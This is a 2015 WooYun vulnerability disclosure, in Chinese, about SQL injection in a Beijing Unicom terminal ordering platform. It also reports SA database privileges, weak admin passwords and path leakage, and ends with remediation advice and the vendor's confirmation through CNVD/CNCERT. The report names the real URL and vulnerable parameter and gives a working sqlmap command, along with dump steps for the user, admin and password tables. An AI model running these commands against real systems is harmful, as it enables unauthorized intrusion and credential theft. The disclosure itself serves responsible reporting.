当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091187

漏洞标题:某联通终端订购平台SQL注入+SA权限+弱密码+路径泄漏

相关厂商:中国联通

漏洞作者: Ch4r0n

提交时间:2015-01-11 13:27

修复时间:2015-02-25 13:28

公开时间:2015-02-25 13:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-11: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-25: 细节向公众公开

简要描述:

这个应可以算得上大厂商了吧?
1、SQL注入涉及多个数据库
2、SA权限,某数据库密码可以破解
3、后台用户密码弱口令

详细说明:

北京联通终端订购平台
http://dg.uninx.com/


1、注入点:

http://dg.uninx.com/dgpt/list.php?searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian=


参数:inpguodaishang未过滤导致boolean-based blind&UNION query&AND/OR time-based blind注入
2、SQLMAP测试过程
测试语句:

sqlmap.py -u "http://dg.uninx.com/dgpt/list.php?
searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian=" -p inpguodaishang --current-db --current-user --level 3 --threads 3 --tamper between.py


--current-db --current-usr.jpg


--dbs.jpg


--users.jpg


--tables -D zddg.jpg


--columns -T user -D zddg.jpg


--count -T user -D zddg.jpg


--dump -T user -D zddg.jpg


这个表里面的username应该是员工号,密码全部为弱口令

--unicom_user -D zddg.png


联通用户674个
3、管理员密码存在弱口令

--dump -T sys_admin_user -D zddg.png


里面9个用户,5个弱口令,其中三个一样。
4、SA权限,有部分数据库用户密码较简单

--is-dba.jpg


--passwords.jpg


5、弱密码进入后台

进入后台.jpg


里面有很多数据,其中包括敏感数据,就不截图了,进来就退出了,请尽快修改弱密码!~~~
而且已经内部通知修改弱口令,但是还是没有改掉哦,通知应该重视啊!~~~
6、路径泄漏

爆路径.jpg


漏洞证明:

--dump -T sys_admin_user -D zddg.png


--is-dba.jpg


--passwords.jpg


爆路径.jpg

修复方案:

1、过滤参数,防注入
2、安全狗
3、修改数据库权限以及弱密码
4、修改管理员用户弱密码
5、绝对路径的泄漏问题
6、你们懂得~~~
请尽快修改弱口令,弱口令啊!~~~

版权声明:转载请注明来源 Ch4r0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-01-16 10:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通通报。

最新状态:

暂无